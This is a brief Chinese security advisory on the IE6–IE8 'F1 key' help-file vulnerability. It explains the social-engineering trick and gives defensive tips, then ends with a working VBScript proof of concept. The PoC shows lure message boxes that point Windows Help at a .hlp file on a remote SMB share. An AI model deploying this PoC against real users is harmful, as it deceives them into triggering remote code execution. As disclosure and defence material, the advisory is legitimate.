近日,微软公司证实IE浏览器存在一个“F1按键”漏洞,大家近期上网时尽量不要按“F1”键,否则有可能触发木马攻击;这个“F1按键”漏洞存在于IE6、IE7、IE8浏览器中,目前微软尚未提供补丁。原理是通过IE浏览器和“Windows帮助程序”互动时的漏洞来实施的。
F1按键本来用于快速打开帮助菜单,此时却变成了黑客设下的圈套,黑客利用伪装的“帮助”程序诱使用户按下F1键后,即可通过该漏洞执行恶意代码,相当于黑客把枪对准了网民,却要由网民自己来扣响扳机。因此,只要不按F1键,就能确保该漏洞不被木马利用。普通的挂马攻击会自动把木马下载到电脑里,而针对“F1按键”漏洞的攻击则需要网民自己按键来触发,但这绝不意味着这个漏洞危害不大。因为国内有相当比例的网民严重缺乏安全意识,如果看到一些网页弹出抽奖、投票一类的对话框,很可能就会按照提示按下F1键,黑客甚至有可能会不断弹出对话框来强迫网民就范。此外,上网时如果遇到被提示要按F1键而又无法关闭浏览器的情况,可以用“任务管理器”来终止IE浏览器的进程。

攻击者可以利用这个安全漏洞执行在运行应用程序的用户上下文任意代码。
成功的攻击会损害可能的应用和底层的计算机。
注意攻击者必须使用社会工程学,以说服信任用户按今年F1键时,攻击者的消息框提示他们这样做。
<html>

<script type="text/vbscript">

big = "\\184.73.14.110\PUBLIC\test.hlp"

//For i=1 to 2500

//  big = big & "\..\"

//Next

MsgBox "please press F1 to save the world", ,"please save the world",

big, 1

MsgBox "press F1 to close this annoying popup", ,"", big, 1

MsgBox "press F1 to close this annoying popup", ,"", big, 1

</script>

</html>